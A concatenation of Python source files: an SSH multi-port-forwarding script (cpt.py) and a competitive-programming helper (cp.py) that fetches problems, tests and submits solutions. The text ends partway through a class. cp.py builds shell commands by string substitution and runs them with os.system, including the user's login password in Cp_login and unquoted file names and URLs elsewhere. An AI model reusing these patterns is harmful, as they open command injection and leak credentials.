if alg.isRunning():
alg.cancel()
finally:
ConfigService.setFacility(facility)
|
cpt.py
|
#!/usr/bin/env python
# Copyright (c) 2022 Vitaly Yakovlev <vitaly@optinsoft.net>
#
# CPT.py
#
# This script allows to forward multiple local ports to the remote host:port via SSH.
# If argument "count" equals 1 then it works exactly as this command:
#
# ssh -L local_port:remote_ip:remote_port ssh_user@ssh_host -i ssh_keyfile
#
# If count = 2 then it is similar to run 2 parallel commands:
#
# ssh -L local_port:remote_ip:remote_port ssh_user@ssh_host -i ssh_keyfile
# ssh -L (local_port+1):(remote_ip+1):remote_port ssh_user@ssh_host -i ssh_keyfile
#
# etc.
import paramiko, sys
from forward import ForwardServer, Handler
import threading
import sys, os
from termcolor import colored
import argparse
import ipaddress
from dotenv import load_dotenv
import json
from cptutils import CommandHandler
def forward_tunnel_server(local_port, remote_host, remote_port, transport):
# this is a little convoluted, but lets me configure things for the Handler
# object. (SocketServer doesn't give Handlers any way to access the outer
# server normally.)
class SubHander(Handler):
chain_host = remote_host
chain_port = remote_port
ssh_transport = transport
server = ForwardServer(("", local_port), SubHander)
server.local_port = local_port
server.remote_host = remote_host
server.remote_port = remote_port
return server
def main():
load_dotenv()
parser = argparse.ArgumentParser(description="CPT.py")
parser.add_argument('--config', help='path to the configuration file (JSON); you can either provide command line arguments to cpt.py or use the configuration file')
parser.add_argument('--local-port', type=int, help='local (client) port is to be forwarded to the REMOTE_IP:REMOTE_PORT')
parser.add_argument('--remote-ip', help='remote host IP')
parser.add_argument('--remote-port', type=int, help='remote host port')
parser.add_argument('--count', default=1, type=int, help='count of the forwarded ports; first local port will be forwarded to the REMOTE_IP:REMOTE_PORT, second - to the REMOTE_IP+1:REMOTE_PORT, etc.')
parser.add_argument('--ssh-host', help='SSH host')
parser.add_argument('--ssh-port', default=22, type=int, help='SSH port')
parser.add_argument('--ssh-user', help='SSH user')
parser.add_argument('--ssh-keyfile', help='SSH private key file')
args = parser.parse_args()
if (args.config):
with open(args.config, 'rt') as f:
t_args = argparse.Namespace()
t_args.__dict__.update(json.load(f))
args = parser.parse_args(namespace=t_args)
required_arg_names = ['local_port', 'remote_ip', 'remote_port',
'count', 'ssh_host', 'ssh_port', 'ssh_user', 'ssh_keyfile']
vargs = vars(args)
missed_args = ", ".join(filter(lambda name : vargs[name] is None, required_arg_names))
if (missed_args):
parser.print_usage()
print("error: the following arguments are required: ", missed_args)
sys.exit(0)
remote_ip = ipaddress.ip_address(args.remote_ip)
count = args.count
remote_port = args.remote_port
local_port = args.local_port
ssh_host = args.ssh_host
ssh_port = args.ssh_port
ssh_user = args.ssh_user
ssh_keyfile = args.ssh_keyfile
ssh_key = paramiko.RSAKey.from_private_key_file(ssh_keyfile)
transport = paramiko.Transport((ssh_host, ssh_port))
transport.connect(hostkey = None,
username = ssh_user,
pkey = ssh_key)
forward_servers = []
forwarding_threads = []
for i in range(0, count):
remote_host = str(remote_ip + i)
forward_servers.append(forward_tunnel_server(local_port+i, remote_host, remote_port, transport))
cmdhandler = CommandHandler(forward_servers)
try:
for server in forward_servers:
forwarding_threads.append(threading.Thread(target=server.serve_forever))
print("Start forwarding...")
for thread in forwarding_threads:
thread.setDaemon(True)
thread.start()
cmdhandler.print_hint()
while not cmdhandler.terminated:
try:
cmd = input(colored('(cpt) ', 'green'))
cmdhandler.handle(cmd)
except KeyboardInterrupt:
stop = True
except Exception as e:
print(str(e))
finally:
print('Terminating...')
# stop servers
for server in forward_servers:
server.shutdown()
# waiting other threads for complete:
for thread in forwarding_threads:
thread.join()
print('Port forwarding stopped.')
sys.exit(0)
if __name__ == "__main__":
main()
|
cp.py
|
try :
import os
import subprocess
import json
from termcolor import colored as clr , cprint
import time
from itertools import zip_longest
from tqdm import tqdm
import threading
import socket
import getpass
from settings.compiler import competitive_companion_port, parse_problem_with_template
from settings.compiler import template_path , coder_name
from system.get_time import digital_time
from data.get_template import get_template
from tools.run_program import if_run_type
except Exception as e:
print(e)
cp_keys = ['-cp','-Cp']
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
class Cp_my_tester:
TLE = 4
def diff_print(self,name,value):
print(' '+name+' :')
for x in value:
x = ' '+ x
print(x)
def different(self,value,output,expected,case):
x = output.split('\n')
y = expected.split('\n')
i = value.split('\n')
pt = ' '+'-'*5+'Problem Found in '+case+'-'*5
cprint(pt,'yellow')
# print('Input :')
# print(value)
self.diff_print('Input',i)
self.diff_print('Output',x)
self.diff_print('Expected',y)
# print('Output :')
# print(output)
# print("Expected :")
# print(expected)
print(" Difference :")
for wx,wy in zip_longest(x,y,fillvalue=''):
print(' ',end='')
for o , e in zip_longest(wx,wy,fillvalue=''):
if(o == e):
cprint(o,'green',end='')
else :
cprint(o,'red',end='')
cprint(e,'yellow',end='')
print()
cprint(' '+'-'*(len(pt)-2),'yellow')
# def sub_process(self,cmd,value):
# tle = False
# try :
# x = subprocess.call(cmd,stdin=subprocess.PIPE,stdout=subprocess.PIPE,timeout=self.TLE)
# with x.stdin as f:
# f.write(value.encode())
# result = (x.communicate()[0]).decode('utf-8')
# except :
# result = "$TLE$"
# tle = True
# return (result,tle)
def sub_process(self,cmd,value):
x = subprocess.Popen(cmd,stdin=subprocess.PIPE,stdout=subprocess.PIPE)
with x.stdin as f:
f.write(value.encode())
result = (x.communicate()[0]).decode('utf-8')
# print(result)
return (result,False)
def test(self,file_name):
path = os.getcwd()
# print(path, file_name)
pt='-'*20+file_name+'-'*20
cprint(pt,'magenta')
pt = (' '*17+"...Testing...")
cprint(pt,'blue')
print()
case_folder = 'testcases'
if os.path.isdir(case_folder):
pass
elif os.path.isdir('test'):
case_folder = 'test'
else:
cprint("Test folder not available.",'red',attrs=['bold'])
return
file_path = os.path.join(path,case_folder)
lt = os.listdir(file_path)
# print(lt)
if len(lt) == 0 :
cprint('Not test file available.')
return
ext = file_name.rsplit(sep='.',maxsplit=1)
type = ''
if len(ext) > 1 :
if ext[1] == 'cpp':
type = 'cpp'
elif ext[1] == 'py':
type = 'py'
if type == 'cpp':
cmd = f"g++ '{file_name}' -o test.out"
t = time.time()
okk = os.system(cmd)
if okk != 0:
cprint("Compilation Error, sir.",'red')
return
t = time.time() - t
t = '{:.4f}'.format(t)
pt = (f' # Compilation time {t} s')
cprint(pt,'blue')
passed = 0
failed = 0
test_files =[]
cases = 0
for file in lt:
ext = file.rsplit(sep='.',maxsplit=1)
# print(f'file = {ext}')
try :
if ext[1] == 'in':
out = ext[0] + '.out'
if os.path.isfile(os.path.join(file_path,out)):
test_files.append((file,out))
cases += 1
else:
# print(f'{out} not found.')
pass
except :
pass
if cases == 0:
cprint(" # No testcase available.",'red')
return
if cases == 1:
cprint(" # 1 testcase found.",'yellow')
else :
cprint(f' # {cases} testcases found','yellow')
st = -1.0
slowest = ''
is_tle = False
for f in test_files:
file = f[0]
out = f[1]
# print(f'testing {file} with {out}')
ext = file.rsplit(sep='.',maxsplit=1)
with open(os.path.join(file_path,file),'r') as f:
value = f.read()
t = time.time()
if type == 'cpp':
result = self.sub_process(['./test.out'],value)
elif type =='py':
result = self.sub_process(['python3',file_name],value)
else:
result = ('',False)
tle = result[1]
result = result[0]
t = time.time() - t
if t > st:
st = t
slowest = ext[0]
# t = '{:.4}'.format(t)
t = f'{t:.4f}'
# print('code :\n',result)
print()
cprint(' * '+ext[0],'yellow')
cprint(' * Time : ','cyan',end='')
if tle :
cprint('TLE','red')
is_tle = True
else :
cprint(t,'cyan')
with open(os.path.join(file_path,out)) as f:
ans = f.read()
# print('Expected :\n',ans)
if result == ans:
cprint(' * Passed','green')
passed += 1
else :
cprint(' * WA','red')
failed += 1
if tle == False:
self.different(value,result,ans,ext[0])
else :
is_tle = True
print()
st = f'{st:.4f}'
pt = f' # Slowest : '
cprint(pt,'blue', end='')
if is_tle :
cprint('TLE','red',end='')
else :
cprint(st,'blue',end='')
cprint(' ['+slowest+']','blue')
pt = (f' # Status : {passed}/{passed+failed} (AC/Total)')
cprint(pt,'yellow')
if failed == 0:
cprint(" # Passed....",'green')
else :
cprint(" # Failed....",'red')
if os.path.isfile('test.out'):
os.remove('test.out')
print()
pt='-'*20+'-'*len(file_name)+'-'*20
cprint(pt,'magenta')
def find_files(self,file_name=''):
file_list = []
# print(file_name)
supported_ext = ['cpp','py']
# print(os.getcwd)
for file in os.listdir(os.getcwd()):
try :
ext = file.rsplit(sep='.',maxsplit=1)
for i in supported_ext:
if ext[1] == i:
if file_name in file:
file_list.append(file)
except:
pass
# print(file_list)
sz = len(file_list)
if sz == 1:
self.test(file_list[0])
elif sz > 1:
no = 1
cprint("All the available files are given below.\n",'yellow')
for file in file_list:
pt = (' '*4+str(no)+') '+file)
cprint(pt,'blue')
no += 1
cprint(' '*4+'0) Cancel operation','red')
print()
while True:
cprint("Select the file index : ",'cyan',end='')
index = int(input())
if index == 0:
cprint("Testing operation cancelled.",'red')
break
elif index < no:
self.test(file_list[index-1])
break
else:
cprint("You have entered the wrong index.Please try again.",'red')
else :
cprint("NO FILE FOUND :(",'red')
class Cp_Problem:
def fetch_problem(self,url = ''):
try :
cprint(' '*17+'...Parsing Problem...'+' '*17,'blue')
if url == '':
cprint('Enter the url : ','cyan',end='')
url = input()
cprint('-'*55,'magenta')
# os.system(cmd)
cmd = 'oj-api get-problem ' + url
cmd = list(cmd.split())
cp = subprocess.run(cmd, universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
problem = json.loads(cp.stdout)
# with open('problem.json','w') as f:
# f.write(cp.stdout)
if problem['status'] == 'ok':
# print('ok')
try :
alphabet = problem['result']['context']['alphabet']
except :
alphabet = ''
problem_name = problem['result']['name']
problem_name = alphabet + '-'+problem_name
# print(problem_name)
if not os.path.isdir(problem_name):
os.mkdir(problem_name)
try:
result = f"\tFetched '{problem_name}' Successfully"
testcases = problem['result']['tests']
# print(testcases)
# if not os.path.isdir(problem_name):
# os.mkdir("'"+problem_name+"'"+'/test')
base = os.getcwd()
path = os.path.join(base,problem_name,"")
info = '{"name" : "$NAME" , "url" : "$URL" }'
info = info.replace('$NAME',problem_name)
info = info.replace('$URL',url)
with open(path+'.info','w') as f:
f.write(info)
# print(path)
if not os.path.isdir(path+"testcases"):
os.mkdir(path+"testcases")
path = os.path.join(path,'testcases')
no = 1
for case in testcases:
# print(case)
fileName_in = 'Sample-'+str(no).zfill(2)+'.in'
fileName_out = 'Sample-'+str(no).zfill(2)+'.out'
# print(fileName_in)
no += 1
with open(os.path.join(path,fileName_in),'w') as fin:
fin.write(case['input'])
with open(os.path.join(path,fileName_out) ,'w') as fout:
fout.write(case['output'])
cprint(result,'green')
except Exception as e:
print(e)
else :
result = "Wrong url."
cprint(result,'result')
cprint('-'*55,'magenta')
except Exception as e:
print('-'*55)
# print(e)
cprint("Sorry Can't Fetch.",'red')
class Cp_login:
def login(self):
try :
cprint(' '*17+'...Log In Service...'+' '*17,'blue')
cprint('Enter judge link : ','cyan',end='')
oj = input()
cprint('Enter your username : ','cyan',end='')
username = input()
password = getpass.getpass(prompt='Enter your password : ')
cmd = "USERNAME=$USERNAME PASSWORD=$PASS oj-api login-service " + oj + '> .status'
cmd = cmd.replace("$USERNAME",username)
cmd = cmd.replace("$PASS",password)
# print(cmd)
os.system(cmd)
with open('.status','r') as f:
cp = f.read()
cp = json.loads(cp)
if cp["result"]['loggedIn']:
cprint("Logged in successfully....",'green')
else :
cprint("Login failed.",'red')
os.remove('.status')
except Exception as e:
# print(e)
cprint("Login failed. (Sad)",'red')
pass
class Cp_Test:
def test_it(self, file_name):
try :
pt='-'*20+file_name+'-'*20
cprint(pt,'magenta')
pt = (' '*17+"...Testing...")
print(clr(pt,'blue'))
cmd = "g++ "+file_name+" && oj t"
# cmd = 'g++ '+file_name+' -o a.out'
os.system(cmd)
# cmd_all =[['g++',file_name,'-o','a.out'] , ['oj','t']]
# cmd_all =[['oj','t']]
# print(cmd)
# for i in cmd_all:
# cp = subprocess.run(i, universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# result = cp.stderr
# result = result.replace('test failed',clr('test failed','red'))
# result = result.replace('WA',clr('WA','red'))
# result = result.replace('AC',clr('AC','green'))
# print(result)
pt = ('-'*20+'-'*len(file_name)+'-'*20)
cprint(pt,'magenta')
except Exception as e:
print(e)
cprint("Got some error. :(",'red')
def find_files(self,file_name=''):
file_list = []
# print(file_name)
supported_ext = ['cpp','py']
# print(os.getcwd)
for file in os.listdir(os.getcwd()):
try :
ext = file.rsplit(sep='.',maxsplit=1)
for i in supported_ext:
if ext[1] == i:
if file_name in file:
file_list.append(file)
except:
pass
# print(file_list)
sz = len(file_list)
if sz == 1:
self.test_it(file_list[0])
elif sz > 1:
no = 1
cprint("All the available files are given below.\n",'yellow')
for file in file_list:
pt = (' '*4+str(no)+') '+file)
cprint(pt,'blue')
no += 1
cprint(' '*4+'0) Cancel operation','red')
print()
while True:
cprint("Select the file index : ",'cyan',end='')
index = int(input())
if index == 0:
cprint("Testing operation cancelled.",'red')
break
elif index < no:
self.test_it(file_list[index-1])
break
else:
cprint("You have entered the wrong index.Please try again.",'red')
else :
cprint("NO FILE FOUND :(",'red')
class Cp_Submit:
def submit_it(self,file_name):
try :
with open('.info','r') as f:
info = f.read()
info = json.loads(info)
problem_name = info['name']
url = info['url']
except :
cprint("Enter the problem url : ",'cyan',end='')
url = input()
problem_name = url
pt = '-'*20+'Problem Description'+'-'*20
cprint(pt,'magenta')
cprint(' '*4+'Problem : ','yellow',end='')
cprint(problem_name,'green')
cprint(' '*4+'Problem url: ','yellow',end='')
cprint(url,'green')
cprint(' '*4+'File name: ','yellow',end='')
cprint(file_name,'green')
cprint('-'*len(pt),'magenta')
cprint('Enter (y/n) to confirm : ','yellow',attrs=['bold'],end='')
x = input()
if x.lower() == 'y' or x.lower == 'yes':
cprint('Submitting...','green')
cmd = 'oj submit --wait=0 --yes $URL $FILENAME'
cmd = cmd.replace('$URL',url)
cmd = cmd.replace('$FILENAME',file_name)
os.system(cmd)
else :
cprint('Submitting Cancelled.','red')
def find_files(self,file_name=''):
cprint(' '*17+'...Submitting Problem...'+'\n','blue')
file_list = []
# print(f'FIle name is {file_name}')
supported_ext = ['cpp','py']
for file in os.listdir(os.getcwd()):
try :
ext = file.rsplit(sep='.',maxsplit=1)
for i in supported_ext:
if ext[1] == i:
if file_name in file:
file_list.append(file)
except:
pass
# print(file_list)
sz = len(file_list)
if sz == 1:
self.submit_it(file_list[0])
elif sz > 1:
no = 1
cprint("All the available files are given below.\n",'yellow')
for file in file_list:
pt = (' '*4+str(no)+') '+file)
cprint(pt,'blue')
no += 1
cprint(' '*4+'0) Cancel operation','red')
print()
while True:
cprint("Select the file number : ",'cyan',end='')
index = int(input())
if index == 0:
cprint("Submitting operation cancelled.",'red')
break
elif index < no:
self.submit_it(file_list[index-1])
break
else:
cprint("You have entered the wrong index.Please try again.",'red')
else :
cprint("NO FILE FOUND :(",'red')
class Cp_add_test:
@property
def take_input(self):
content = ''
while True:
try :
line = input()
except EOFError:
break
content += line +'\n'
return content
def test_print(self,name,value):
pt = '-'*22+name+'-'*22
cprint(pt,'magenta')
value = value.split(sep='\n')
for x in value:
x = ' '+ x
print(x)
def add_case(self , no = 1,name='Custom-'):
""" function for adding testcases """
try :
pt='-'*20+'-'*10+'-'*20
cprint(pt,'magenta')
pt = (' '*17+"...Adding Testcase..."+'\n')
print(clr(pt,'blue'))
folder_name = 'testcases'
if os.path.isdir(folder_name):
pass
elif os.path.isdir('test'):
folder_name = 'test'
else :
os.mkdir(folder_name)
path_name = os.path.join(os.getcwd(),folder_name)
# print(path_name)
lt = os.listdir(path_name)
# print(lt)
ase = len(lt)
no = int(ase/2)+1
cprint('Enter the input(Press Ctrl+d or Ctrl+z after done):','yellow')
x = self.take_input
cprint('Enter the output(Press Ctrl+d or Ctrl+z after done):','yellow')
y = self.take_input
fileName_in = name+str(no).zfill(2)+'.in'
fileName_out = name+str(no).zfill(2)+'.out'
print()
self.test_print(fileName_in,x)
self.test_print(fileName_out,y)
cprint('-'*55,'magenta')
cprint("Do you want to add this testcase(y/n) :",'cyan',end='')
confirm = input().lower()
positive = ['y','yes']
if confirm in positive:
pass
else :
cprint("Cancelled.",'red')
return
no += 1
with open(os.path.join(path_name,fileName_in),'w') as fin:
fin.write(x)
with open(os.path.join(path_name,fileName_out) ,'w') as fout:
fout.write(y)
cprint('Testcase added Sucessfully. :D','green',attrs=['bold'])
pt='-'*20+'-'*10+'-'*20
cprint(pt,'magenta')
except:
cprint("Can't add testcase. :( ",'red',attrs=['bold'])
class Cp_bruteforce:
def find_files(self,file_name=''):
file_list = []
# print(f'FIle name is {file_name}')
supported_ext = ['cpp','py']
for file in os.listdir(os.getcwd()):
try :
ext = file.rsplit(sep='.',maxsplit=1)
for i in supported_ext:
if ext[1] == i:
if file_name in file:
file_list.append(file)
except:
pass
# print(file_list)
sz = len(file_list)
if sz == 1:
return (file_list[0],True)
elif sz > 1:
xp = file_name
if xp == '':
xp = 'test'
cprint(' '*17+'...Choose '+xp +' file...'+'\n','blue')
no = 1
cprint("All the available files are given below.\n",'yellow')
for file in file_list:
pt = (' '*4+str(no)+') '+file)
cprint(pt,'blue')
no += 1
cprint(' '*4+'0) Cancel operation','red')
print()
while True:
cprint("Select the file number : ",'cyan',end='')
index = int(input())
if index == 0:
cprint("Bruteforcing operation cancelled.",'red')
return ('Cancelled',False)
break
elif index < no:
return (file_list[index-1],True)
break
else:
cprint("You have entered the wrong index.Please try again.",'red')
else :
cprint("NO FILE FOUND :(",'red')
return ('FILE NOT FOUND',False)
def diff_print(self,name,value):
print(' '+name+' :')
for x in value:
x = ' '+ x
print(x)
def different(self,value,output,expected):
x = output.split('\n')
y = expected.split('\n')
i = value.split('\n')
pt = ' '+'-'*5+'Problem Found'+'-'*5
cprint(pt,'yellow')
# print('Input :')
# print(value)
self.diff_print('Input',i)
self.diff_print('Output',x)
self.diff_print('Expected',y)
# print('Output :')
# print(output)
# print("Expected :")
# print(expected)
print(" Difference :")
for wx,wy in zip_longest(x,y,fillvalue=''):
print(' ',end='')
for o , e in zip_longest(wx,wy,fillvalue=''):
if(o == e):
cprint(o,'green',end='')
else :
cprint(o,'red',end='')
cprint(e,'yellow',end='')
print()
cprint(' '+'-'*(len(pt)-2),'yellow')
def sub_process(self,cmd,value,iput):
x = subprocess.Popen(cmd,stdin=subprocess.PIPE,stdout=subprocess.PIPE)
# print('here')
with x.stdin as f:
if iput:
f.write(value.encode())
result = (x.communicate()[0]).decode('utf-8')
# print(result)
return (result,False)
def cmd_manager(self,file_name,value,ext,iput = True):
pass
if ext == 'py':
cmd = ['python3',file_name]
elif ext == 'cpp':
ext = file_name.rsplit(sep='.',maxsplit=1)
cmd = './'+ext[0]
cmd = [cmd]
else:
cprint('command manager failed.','red')
return ''
# print(cmd)
return self.sub_process(cmd,value,iput)[0]
def add_case(self ,x,y, no = 1,name='Genarated-'):
""" function for adding testcases """
try :
test_folder = 'testcases'
if os.path.isdir('testcases'):
test_folder = 'testcases'
elif os.path.isdir('test'):
test_folder = 'test'
else :
os.mkdir('testcases')
path_name = os.path.join(os.getcwd(),test_folder)
# print(path_name)
lt = os.listdir(path_name)
# print(lt)
ase = len(lt)
no = int(ase/2)+1
fileName_in = name+str(no).zfill(2)+'.in'
fileName_out = name+str(no).zfill(2)+'.out'
# print(fileName_in)
no += 1
with open(os.path.join(path_name,fileName_in),'w') as fin:
fin.write(x)
with open(os.path.join(path_name,fileName_out) ,'w') as fout:
fout.write(y)
cprint('Testcase added Sucessfully. :D','green',attrs=['bold'])
except:
cprint("Can't add testcase. :( ",'red',attrs=['bold'])
def run(self):
pass
brute_file = self.find_files('brute')
# print(brute_file)
if brute_file[1] == False:
return
# print(brute_file[0])
gen_file = self.find_files('gen')
# print(gen_file)
# print(gen_file[1])
if gen_file[1] == False:
return
test_file = self.find_files('')
if test_file[1] == False:
return
test_file = test_file[0]
brute_file = brute_file[0]
gen_file = gen_file[0]
# print(test_file)
cprint('How many times do you want to stress? : ','cyan',end ='')
no = int(input())
if no < 1:
cprint('You want to bruteforce test less than 1 time? Seriously man? (-_-)','red')
return
# testing....
print()
brute_ext = brute_file.rsplit(sep='.',maxsplit=1)[1]
gen_ext = gen_file.rsplit(sep='.',maxsplit=1)[1]
test_ext = test_file.rsplit(sep='.',maxsplit=1)[1]
# print(brute_ext,gen_ext,test_ext)
if brute_ext == 'cpp':
# print('cpp = ',brute_file)
ext = brute_file.rsplit(sep='.',maxsplit=1)[0]
cmd = "g++ "+brute_file+" -o "+ext
with tqdm(total=1.0,desc=brute_file+' compiling',initial=.25) as pbar:
os.system(cmd)
pbar.update(.75)
print()
if gen_ext == 'cpp':
# print('cpp = ',gen_file)
ext = gen_file.rsplit(sep='.',maxsplit=1)[0]
cmd = "g++ "+gen_file+" -o "+ext
with tqdm(total=1.0,desc=gen_file+' compiling',initial=.25) as pbar:
os.system(cmd)
pbar.update(.75)
print()
if test_ext == 'cpp':
# print('cpp = ',test_file)
ext = test_file.rsplit(sep='.',maxsplit=1)[0]
cmd = "g++ "+test_file+" -o "+ext
with tqdm(total=1.0,desc=test_file+' compiling',initial=.25) as pbar:
os.system(cmd)
pbar.update(.75)
print()
digit = len(str(no))
print()
st = -1.0
pt='-'*20+test_file+'-'*20
cprint(pt,'magenta')
pt = (' '*13+"...Bruteforcing...")
print()
cprint(f' # Test File : ','yellow',end='')
cprint(f'{test_file}','cyan')
cprint(f' # Brute File : ','yellow',end='')
cprint(f'{brute_file}','cyan')
cprint(f' # Gen File : ','yellow',end='')
cprint(f'{gen_file}','cyan')
cprint(f' # Stress : ','yellow',end='')
cprint(f'{no} ','cyan',end=' ')
if no < 2:
cprint('time','cyan')
else :
cprint('times','cyan')
print()
cprint(pt,'blue')
print()
for i in range(no):
pass
iput = self.cmd_manager(gen_file,'',gen_ext,False)
# print(iput)
ans = self.cmd_manager(brute_file,iput,brute_ext,True)
# print(ans)
t = time.time()
result = self.cmd_manager(test_file,iput,test_ext,True)
# print(ans)
t = time.time() - t
cprint(' * '+str(i+1).zfill(digit)+') ','yellow',end='')
# if(iput == '4\n'):
# print(ans)
# print(result)
# break
if t > st:
st = t
if result == ans:
cprint('Passed...','green',end=' ')
else :
cprint('Failed...','red',end=' ')
cprint(f'[ Time : {t:.4f} sec ]','cyan')
self.different(iput,result,ans)
print()
cprint(' # Failed. :(','red')
with open('hack.in','w') as f:
f.write(iput)
with open('hack.out','w') as f:
f.write(ans)
print()
cprint('Do you want to add this case to your testcases list? (Y/N) : ','cyan',attrs = ['bold'],end='')
want = input()
want = want.lower()
if want == 'y' or want =='yes':
# cprint('Test case added successfully.','green')
self.add_case(iput,ans)
return
cprint(f'[ Time : {t:.4f} sec ]','cyan')
print()
cprint(f' # Slowest : {st:.4f} sec.','blue')
cprint(f' # Accepted.','green')
print()
pt='-'*20+'-'*len(test_file)+'-'*20
cprint(pt,'magenta')
class Cp_setup:
def sub_process(self,cmd):
try:
x = subprocess.Popen(cmd,stdout=subprocess.PIPE)
# print('here')
result = (x.communicate()[0]).decode('utf-8')
except :
result = ''
# print(result)
return (result)
def gen_py(self):
pass
try :
case_folder = ''
if os.path.isdir('testcases'):
case_folder = 'testcases'
elif os.path.isdir('test'):
case_folder = 'test'
else :
cprint(" testcases folder not available, Can't generate gen.py file. :(",'red')
return
cmd = ['python3','-m','tcgen','--path',case_folder]
result = self.sub_process(cmd)
# print('result is \n',result)
if result == '':
cprint(" Can't generated gen file automatically. Sorry sir. :( ",'red')
return
with open('gen.py','w') as f:
f.write(result)
cprint(' gen.py genarated successfully, sir. :D','green')
except Exception as e:
print(e)
cprint(" Sorry, Sir can't genarate automatically gen file. ")
def template(self,file_path='',file_name='sol.cpp',parsingMode=False):
try :
# print('Genarating template')
from settings.compiler import template_path , coder_name
from system.get_time import digital_time
# print(template_path)
ext = file_name.rsplit(sep='.',maxsplit=1)
if(len(ext) == 1) :
ext = 'cpp'
file_name = file_name+'.cpp'
else :
ext = ext[1]
if ext == 'cpp':
path = template_path['c++']
elif ext == 'py':
path = template_path['python']
else :
cprint(' File format not supported. Currently only support c++ and python.','red')
try :
# path = f"'{path}'"
# path = 't.cpp'
fName = file_name
info_path = '.info'
if file_path != '':
file_name = os.path.join(file_path,file_name)
info_path = os.path.join(file_path,info_path)
if os.path.isfile(file_name):
if parsingMode:
return
cprint(f" {fName} already exist, do you want to replace it?(Y/N) :",'cyan',end='')
want = input()
want = want.lower()
if want !='y' and want!='yes':
cprint(f" {fName} creation cancelled.",'red')
return
info_ase = False
if os.path.isfile(info_path):
info_ase = True
if path == '$DEFAULT':
if ext == 'py':
if info_ase:
code = get_template('py_template_info.txt')
else :
code = get_template('py_template.txt')
else :
if info_ase:
code = get_template('cpp_template_info.txt')
else :
code = get_template('cpp_template.txt')
else :
with open(path,'r') as f:
code = f.read()
problem_name = '-X-'
problem_url = '-X-'
problem_timeLimit = 'NULL'
problem_memoryLimit = 'NULL'
try :
if info_ase :
with open(info_path,'r') as f:
info = f.read()
info = json.loads(info)
problem_name = info['name']
problem_url = info['url']
problem_timeLimit = info['timeLimit']
problem_memoryLimit = info['memoryLimit']
except :
pass
code = code.replace('$%CODER%$',coder_name)
code = code.replace('$%DATE_TIME%$',digital_time())
code = code.replace('$%PROBLEM_NAME%$',problem_name)
code = code.replace('$%PROBLEM_URL%$',problem_url)
code = code.replace('$%TIMELIMIT%$',problem_timeLimit)
code = code.replace('$%MEMORYLIMIT%$',problem_memoryLimit)
with open(file_name,'w') as f:
f.write(code)
# print(code)
if parsingMode == False:
cprint(f' {fName} created succussfully, sir. :D','green')
except Exception as e:
# cprint(e,'red')
cprint("template path doesn't exist. Sorry sir.",'red')
cprint("check settings/compiler.py to change your template path :D .",'yellow')
return
except Exception as e:
cprint(e,'red')
cprint("Can't genarate template.",'red')
return
def brute(self,file_name='brute.cpp'):
try :
if os.path.isfile(file_name):
cprint(f" {file_name} already exist, do you want to replace it?(Y/N) :",'cyan',end='')
want = input()
want = want.lower()
if want !='y' and want!='yes':
cprint(f" {file_name} creation cancelled.",'red')
return
with open(file_name,'w') as f:
f.write('/* Bruteforce */\n')
cprint(f' {file_name} created successfully, sir. :D','green')
except :
cprint(f" Cant't create {file_name}",'red')
def setup(self,t_name = 'sol.cpp',brute_name='brute.cpp'):
if not os.path.isfile(t_name) :
self.template()
else :
cprint(f" {t_name} exists.",'green')
if not os.path.isfile(brute_name):
self.brute()
else :
cprint(f" {brute_name} exists.",'green')
self.gen_py()
pass
class Cp_contest():
def fetch_problem(self,url = ''):
try :
cmd = 'oj-api get-problem ' + url
cmd = list(cmd.split())
cp = subprocess.run(cmd, universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
problem = json.loads(cp.stdout)
# with open('problem.json','w') as f:
# f.write(cp.stdout)
if problem['status'] == 'ok':
# print('ok')
try :
alphabet = problem['result']['context']['alphabet']
except:
alphabet = ''
problem_name = problem['result']['name']
problem_name = alphabet + '-'+problem_name
# print(problem_name)
if not os.path.isdir(problem_name):
os.mkdir(problem_name)
try:
result = f" * Fetched '{problem_name}'' Successfully"
testcases = problem['result']['tests']
# print(testcases)
# if not os.path.isdir(problem_name):
# os.mkdir("'"+problem_name+"'"+'/test')
base = os.getcwd()
path = os.path.join(base,problem_name,"")
info = '{"name" : "$NAME" , "url" : "$URL" }'
info = info.replace('$NAME',problem_name)
info = info.replace('$URL',url)
with open(path+'.info','w') as f:
f.write(info)
# print(path)
if not os.path.isdir(path+"testcases"):
os.mkdir(path+"testcases")
path = os.path.join(path,'testcases')
no = 1
for case in testcases:
# print(case)
fileName_in = 'Sample-'+str(no).zfill(2)+'.in'
fileName_out = 'Sample-'+str(no).zfill(2)+'.out'
# print(fileName_in)
no += 1
with open(os.path.join(path,fileName_in),'w') as fin:
fin.write(case['input'])
with open(os.path.join(path,fileName_out) ,'w') as fout:
fout.write(case['output'])
cprint(result,'green')
except Exception as e:
print(e)
else :
result = "Wrong url."
cprint(result,'result')
except Exception as e:
print('-'*55)
# print(e)
cprint("Sorry Can't Fetch.",'red')
def parse_contest(self,url=''):
try :
cprint(' '*17+'...Parsing Contest...'+' '*17,'blue')
if url == '':
cprint('Enter the url : ','cyan',end='')
url = input()
cprint('-'*55,'magenta')
# os.system(cmd)
t = time.time()
cmd = 'oj-api get-contest ' + url
cmd = list(cmd.split())
cp = subprocess.run(cmd, universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
contest = json.loads(cp.stdout)
# with open('problem.json','w') as f:
# f.write(cp.stdout)
result = "\tFetched Contest info..."
if contest['status'] == 'ok':
cprint(result,'green')
else :
cprint("Sorry contest can't be fetched. Sorry sir. :( ",'red')
return
# print(contest)
path = os.getcwd()
# print(path)
contest_name = contest['result']['name']
cprint(f' # Contest name : {contest_name}','green')
if not os.path.isdir(contest_name):
os.mkdir(contest_name)
# cprint('Contest folder created.','green')
print()
os.chdir(os.path.join(path,contest_name))
# print(os.getcwd())
problem = contest['result']['problems']
with open('t.json','w') as f:
f.write(str(contest))
for key in problem:
url = key['url']
# print(url)
# Cp_Problem.fetch_problem(url)
self.fetch_problem(url=url)
os.chdir(path)
# print(os.getcwd())
print()
cprint(" # Done. :D",'green')
cprint(f" # Time taken {time.time()-t:.4f} sec.",'blue')
cprint('-'*55,'magenta')
except Exception as e:
cprint(e,'red')
class Cp_ext:
HOST = '127.0.0.1'
PORT = competitive_companion_port
def template(self,file_path,file_name='sol.cpp'):
try :
obj_template = Cp_setup()
